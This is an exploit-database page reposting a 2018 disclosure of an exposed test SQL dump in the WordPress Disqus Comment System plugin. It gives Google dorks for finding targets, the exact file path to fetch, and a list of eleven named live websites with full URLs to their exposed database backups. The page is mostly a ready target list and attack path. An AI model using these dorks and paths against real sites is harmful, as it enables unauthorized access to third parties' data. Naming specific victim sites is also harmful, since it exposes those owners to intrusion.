Advertisement






WordPress Disqus Comment System Plugins 2.87 Database Backup Disclosure

CVE Category Price Severity
Author Risk Exploitation Type Date
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018120087

Below is a copy:

WordPress Disqus Comment System Plugins 2.87 Database Backup Disclosure
#################################################################################################

# Exploit Title : WordPress Disqus Comment System Plugins 2.87 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/12/2018
# Vendor Homepage : disqus.com ~ wordpress.org/plugins/disqus-comment-system/
# Software Download Link : github.com/clearhead/clearhead.me/archive/master.zip
+ github.com/clearhead/clearhead.me/blob/master/wp-content/plugins/disqus-comment-system/tests/initial.sql
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.87 and 3.0
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/disqus-comment-system/tests/''
intext:''Greyzed Theme created by The Forge Web Creations. Powered by WordPress.''
intext:'' 2008 - 2018 Grazitti Interactive. All rights reserved''
intext:''HyTrade Marketing & Comunicao  2017 | Todos direitos reservados''
intext:'' 2018 Chainbit, LLC. All rights reserved''
intext:''Copyright 2015 / CIP Data Collection Ltd Company No. 10462735''
intext:'' 2017 Longlife Magazine - All Rights Reserved.''
intext:'' Copyright Feira Cultural 2017. Todos os direitos reservado''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

-- MySQL dump 10.13  Distrib 5.1.48, for apple-darwin10.4.0 (i386)
--
-- Host: localhost    Database: wordpress
-- ------------------------------------------------------
-- Server version5.1.48

#################################################################################################

# Admin Panel Login Path : 

/wp-login.php

# Exploit : 

/wp-content/plugins/disqus-comment-system/tests/initial.sql

#################################################################################################

# Example Vulnerable Sites =>

[+] therussianlinesman.com/blog/wp-content/plugins/disqus-comment-system/tests/initial.sql

[+] hytrade.com.br/wp-content/plugins/disqus-comment-system/tests/initial.sql

[+] grazitti.com/wp-content/plugins/disqus-comment-system/tests/initial.sql

[+] paulsforza.com/wordpress/wp-content/plugins/disqus-comment-system/tests/initial.sql

[+] combbo.com.br/cmb/wp-content/plugins/disqus-comment-system/tests/initial.sql

[+] uof7.com/wp-content/plugins/disqus-comment-system/tests/initial.sql

[+] ecommerceandb2b.com/b2bblog/wp-content/plugins/disqus-comment-system/tests/initial.sql

[+] cipmetering.com/wp-content/plugins/disqus-comment-system/tests/initial.sql

[+] soogran.com/wp-content/plugins/disqus-comment-system/tests/initial.sql

[+] longlifemagz.com/wp-content/plugins/disqus-comment-system/tests/initial.sql

[+] feiracultural.art.br/wp-content/plugins/disqus-comment-system/tests/initial.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.